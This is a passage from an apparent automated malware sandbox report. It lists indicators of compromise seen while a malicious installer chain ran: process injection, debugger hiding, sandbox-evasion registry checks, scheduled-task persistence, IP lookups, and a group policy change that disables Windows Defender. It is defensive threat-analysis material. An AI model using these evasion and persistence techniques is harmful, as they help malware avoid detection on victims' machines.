\??\W: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 213 ipinfo.io 309 ipinfo.io 310 ipinfo.io 44 api.db-ip.com 45 api.db-ip.com 212 ipinfo.io 28 ip-api.com 40 ipinfo.io 41 ipinfo.io -
Drops file in System32 directory 30 IoCs
Processes:
rundll32.exerundll32.exesvchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2481030822-2828258191-1606198294-1000 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\sqtvvs.exe svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 348380499F51296B svchost.exe File opened for modification C:\Windows\System32\Tasks\AqDFSDlmWiui svchost.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{51C2619E-6BAC-4F16-BCD0-83AD14025AE1} svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 31 IoCs
Processes:
2961645.scr2194961.scr7298731.scra5ccnK2kBlCtiR75sQxNe_I1.exe3EtYdlz4BS4Q34tWZ34_sC7C.exePp65i0I9Y1K24s5W4LIQd_5I.exevDcRvuTFCixtJC75CIreIU92.exefyvQdHwzHGYq2Y1YeKRPw2uR.exellCjLXY4R9fHB5q2TyjOChUC.exeSkGivFjV9Ji_kRe4vX2iMLzl.exeaCPcYZ6iFEv51xb_qSWfJfGr.exeQumrVwXKK14FQlUoX6ujeFTg.exeO9lXeYrvcZsFeuQn9WTBaPjh.exe3237477.scr3883540.scr6984721.scr4062075.scrpid process 3332 2961645.scr 4008 2194961.scr 3124 7298731.scr 3816 a5ccnK2kBlCtiR75sQxNe_I1.exe 4744 3EtYdlz4BS4Q34tWZ34_sC7C.exe 2788 Pp65i0I9Y1K24s5W4LIQd_5I.exe 1880 vDcRvuTFCixtJC75CIreIU92.exe 4216 fyvQdHwzHGYq2Y1YeKRPw2uR.exe 2524 llCjLXY4R9fHB5q2TyjOChUC.exe 4956 SkGivFjV9Ji_kRe4vX2iMLzl.exe 4292 aCPcYZ6iFEv51xb_qSWfJfGr.exe 5404 QumrVwXKK14FQlUoX6ujeFTg.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 7668 3237477.scr 8052 3883540.scr 6648 6984721.scr 7224 4062075.scr -
Suspicious use of SetThreadContext 11 IoCs
Processes:
Mon20927aab1e5.exesvchost.exeWrQ99Xx0hAs_aCUMzjhze3if.exeYQuyJEBXZ9noq8wFtxIcifjm.exe3NdneS6adaJJUV_orTDHgDpY.exeO9lXeYrvcZsFeuQn9WTBaPjh.exeservices64.exejhbafrfjhbafrfjhbafrfdescription pid process target process PID 2696 set thread context of 3240 2696 Mon209c830507d573.exe PID 1992 set thread context of 1560 1992 Mon20927aab1e5.exe Mon20927aab1e5.exe PID 3916 set thread context of 4384 3916 svchost.exe svchost.exe PID 4440 set thread context of 5580 4440 WrQ99Xx0hAs_aCUMzjhze3if.exe WrQ99Xx0hAs_aCUMzjhze3if.exe PID 5084 set thread context of 5264 5084 YQuyJEBXZ9noq8wFtxIcifjm.exe YQuyJEBXZ9noq8wFtxIcifjm.exe PID 3912 set thread context of 6368 3912 3NdneS6adaJJUV_orTDHgDpY.exe RegSvcs.exe PID 4232 set thread context of 4172 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe O9lXeYrvcZsFeuQn9WTBaPjh.exe PID 5760 set thread context of 7980 5760 services64.exe explorer.exe PID 13632 set thread context of 14836 13632 jhbafrf jhbafrf PID 9196 set thread context of 14172 9196 jhbafrf jhbafrf PID 9680 set thread context of 10396 9680 jhbafrf jhbafrf -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeDYbALA.exedata_load.exesetup.tmpmsiexec.exepowershell.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll autosubplayer.exe File created C:\Program Files\Windows NT\DUOYKKCDGQ\foldershare.exe.config DYbALA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\bckf.fon data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png autosubplayer.exe File opened for modification C:\Program Files\temp_files\cache.dat data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\data_load.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\AqDFSDlmWiui.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\AqDFSDlmWiui\cache.dat powershell.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll autosubplayer.exe -
Drops file in Windows directory 43 IoCs
Processes:
msiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process File opened for modification C:\Windows\Installer\MSIA2BA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA4BE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF783.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIE851.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIEB44.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9F8A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA58A.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIEF2F.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri File opened for modification C:\Windows\Installer\f799940.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIE90F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEA87.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\f799943.msi msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Installer\f799940.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIEB33.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEE82.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEF5F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF144.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF29D.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI9C6C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE8BF.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIA066.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA161.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF4E0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF54F.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4944 2008 WerFault.exe Mon206b909958ed4.exe 4360 2008 WerFault.exe Mon206b909958ed4.exe 5636 2008 WerFault.exe Mon206b909958ed4.exe 6124 5688 WerFault.exe YyIud4HFsyGFz5LtvQy2JvHe.exe 5148 2008 WerFault.exe Mon206b909958ed4.exe 5780 940 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe 6164 940 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe 6308 2008 WerFault.exe Mon206b909958ed4.exe 6612 940 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe 6896 940 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe 3444 2008 WerFault.exe Mon206b909958ed4.exe 7076 4232 WerFault.exe O9lXeYrvcZsFeuQn9WTBaPjh.exe 7412 940 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe 7616 940 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe 7824 940 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe 8068 940 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe 7936 940 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Mon204014f13870f5e.exe0hsYE0Ua39VMSSKkhNqNhUpL.exejhbafrfjhbafrfYQuyJEBXZ9noq8wFtxIcifjm.exejhbafrfdescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon204014f13870f5e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0hsYE0Ua39VMSSKkhNqNhUpL.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0hsYE0Ua39VMSSKkhNqNhUpL.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jhbafrf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jhbafrf Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jhbafrf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon204014f13870f5e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon204014f13870f5e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI YQuyJEBXZ9noq8wFtxIcifjm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jhbafrf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI YQuyJEBXZ9noq8wFtxIcifjm.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI YQuyJEBXZ9noq8wFtxIcifjm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jhbafrf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jhbafrf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0hsYE0Ua39VMSSKkhNqNhUpL.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jhbafrf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jhbafrf Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jhbafrf -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6728 schtasks.exe 6252 schtasks.exe 1012 schtasks.exe 6096 schtasks.exe 6344 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 11428 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2788 taskkill.exe 6936 taskkill.exe 6884 taskkill.exe 5756 taskkill.exe 14648 taskkill.exe -
Processes:
browser_broker.exeMicrosoftEdgeCP.exeMicrosoftEdge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
rundll32.exesvchost.exesvchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine\SOFTWARE\Policies rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine\SOFTWARE rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122 = "Windows Firewall" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}USER rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine\SOFTWARE\Policies rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine\SOFTWARE rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}User rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{7371D6E3-91A4-4989-ADEC-78E1EEEEF5EB}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = 